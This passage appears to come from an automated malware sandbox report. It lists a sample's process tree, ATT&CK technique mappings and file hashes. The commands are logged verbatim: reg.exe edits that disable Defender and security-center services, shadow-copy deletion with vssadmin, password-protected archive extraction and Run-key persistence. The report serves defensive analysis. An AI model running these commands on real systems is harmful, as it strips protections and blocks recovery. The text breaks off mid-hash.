C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2496

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1532

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:328

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:776

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:192

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2244

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:2320

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4012

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:2744

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:2232

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:3632

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
PID:1516

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1732

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:3420

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3580

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:660

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Modifies security service
PID:3744

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:876

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Modifies security service
PID:1724

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:1532

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1616

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:3964

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:360

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1980

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2376

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:3204

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:2296

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:2636

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
8⤵
PID:1604

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:2812

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:2320

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:2208

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:688

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1184

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:916

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2744

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:712

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:1608

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:3924

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1416

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:2004

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:3940

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:2176

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3604

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Modifies security service
PID:2336

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:3592

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:1264

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2020

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3632

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:2080

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:4080

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3284

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:2220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Get-MpPreference"
6⤵
PID:1764

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
6⤵
- Interacts with shadow copies
PID:3100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\execute.bat" "
5⤵
PID:852

C:\Windows\SysWOW64\mode.com
mode 65,10
6⤵
PID:1264

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e file.zip -p___________25092pwd17773pwd27010___________ -oextracted
6⤵
- Executes dropped EXE
PID:2812

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_11.zip -oextracted
6⤵
- Executes dropped EXE
PID:3768

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_10.zip -oextracted
6⤵
- Executes dropped EXE
PID:2928

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_9.zip -oextracted
6⤵
- Executes dropped EXE
PID:1252

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_8.zip -oextracted
6⤵
- Executes dropped EXE
PID:3424

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_7.zip -oextracted
6⤵
- Executes dropped EXE
PID:3772

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_6.zip -oextracted
6⤵
- Executes dropped EXE
PID:3756

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_5.zip -oextracted
6⤵
- Executes dropped EXE
PID:1400

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_4.zip -oextracted
6⤵
- Executes dropped EXE
PID:4012

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_3.zip -oextracted
6⤵
- Executes dropped EXE
PID:1884

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_2.zip -oextracted
6⤵
- Executes dropped EXE
PID:200

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_1.zip -oextracted
6⤵
- Executes dropped EXE
PID:1676

C:\ProgramData\ConsoleApp\eDbwCBj.exe
"eDbwCBj.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:408

C:\Windows\SysWOW64\at.exe
at.exe
7⤵
PID:2836

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Speranza.bmp
7⤵
PID:1576

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:1788

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^MRGsyaFvsBfEYwHcFenTgTsUhffAiSwxLsmKcSPEfQgUfzhvsafEbXnSmMrPetfmmVTGCWZNhUDnFbETwTpPDbWOTGlJOZBkBPcxAHUxzCdCzqheilOpVmVwYtNVMfYhaaWP$" Baciocchi.bmp
9⤵
PID:2744

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nemica.exe.com
Nemica.exe.com q
9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3792

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nemica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nemica.exe.com q
10⤵
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2868

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exe
11⤵
PID:2564

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
9⤵
PID:1256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet002.bat" "
5⤵
PID:1344

C:\Windows\SysWOW64\timeout.exe
timeout /T 120 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:3252

C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1036

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1180

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

BITS Jobs

T1197

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Deletion

T1107

BITS Jobs

T1197

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ConsoleApp\7za.exe
MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\ConsoleApp\7za.exe
MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\ConsoleApp\7za.exe
MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\ConsoleApp\ControlSet000.bat
MD5
88105ac7d8d4bedefc5dafb4c0b8a5bf

SHA1
09eef2b0f85f9760ad744468474214c95f3872cc

SHA256
145bb60685ba6f37aca0a5bd87728b6f8c06d130060b80dccb536ccd4943b992

SHA512
f5bf945749e738e0962c47a393a2e33832e7ce482c263e39cfa2c3a9629d58972d9124ca723bfae72835ed7d2a1fb5fed7bd13a8fa9ab7ed0f761074fe503e58

Download Submit
C:\ProgramData\ConsoleApp\ControlSet001.bat
MD5
7e6cf2526d9c0cecd79c00ecad8b7216

SHA1
f6a78b432858c139be69731246ea03d4381805ac

SHA256
e3352d38ac6c968581d1df26865f7c7cee34e3692c32c933ea274d84e87c932f

SHA512
948aa58d47da7ea8f9a0c4107c89f98f84dfb3b062d5cabf48fb0b6de432fd0b7b78aafbfab61d2a5d53f6ffbab76d74ce674f7f0f67ebd080df13151b33d6ac

Download Submit
C:\ProgramData\ConsoleApp\ControlSet002.bat
MD5
bdf56efeda1e10f47d5a258211fadb72

SHA1
641725bf63662d90b567baf3a103f860e44babc4

SHA256
fc13522de3d1b6e4d9730b46e869c1efb28a604ac32bb6ba4b08cd9c908f233c

SHA512
ebf041a4b0db7e6883943ca73264a4a4853d0d4cc4a8d699a6cbcdad1dbf8046d6469675b5f032c220f9c7aed7a130f3d66c614069ca6ff9c44db01f3d7d101f

Download Submit
C:\ProgramData\ConsoleApp\ControlSet003.vbs
MD5
cedbc2b4a64107eed135adb98b678f2d

SHA1
6f744946e4d9d1b4fa82882f0a61cbd70468f227

SHA256
25a6210a703c6274232184ab42c0b570bacf147870d8663e9cf04e1edf29b7bc

SHA512
ed15bfabd1056e066afeaa01cca5f32918d7da141bdc1dea8589104b50831d5acae043cf0cae0aaa9ab5aa3dabd1bffc12a4ce8e72fa483f958bc45040211ccd

Download Submit
C:\ProgramData\ConsoleApp\execute.bat
MD5
66eddcb37eb829581fb77668b39f660a

SHA1
902030e80e5133c2d74ff08fc58601fd02e5229c

SHA256
ec8fdbd4bbc286ea256d944ff564613ee72881f57c049e324b55f3e57c97fc88

SHA512
3fa7da6ee8e963d9be4e3162f9c1748edb52b8594191e592c3fdb1befc357cc0787650091cffc402a2586d0b10fc5f16241f09fa9853eb65031192eced47e83f

Download Submit
C:\ProgramData\ConsoleApp\file.bin
MD5
72b3f77a6f31efe4673bd8d9026dcb4f

SHA1
724fd98e03faf2a2c11b0b0d444070dbc2070227

SHA256
eb472fae72a94afb69ae3be4990fd70a83d17a43db3cfbb427a6a7d21ed80f03

SHA512
a4b29a2791140ac264aad77cd07663f5d488de91b0654d3260decbc3dc16d5392887cf2e5d4e9b379a2bc68f9422bd6712a6c90edae0ded60948cd6ae88367e0

Download Submit
C:\ProgramData\ConsoleApp\hfile.bin
MD5
0bc0ab4f89dba36e9c51689c91ed2b20

SHA1
69ed3ebc9c922907435318d1e9bc61db4405a52e

SHA256
f142491365b35a78cac70c0139e606241d732c7f556694efc51ab07724e08f04

SHA512
9295410dd6b84e3142368bff8f1cc480f61a6f3a67037f046111f5d6506af7543e70f03df4a7b6e296f1091b1f480500192d9d88cae54780fcc27618b01123ba

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
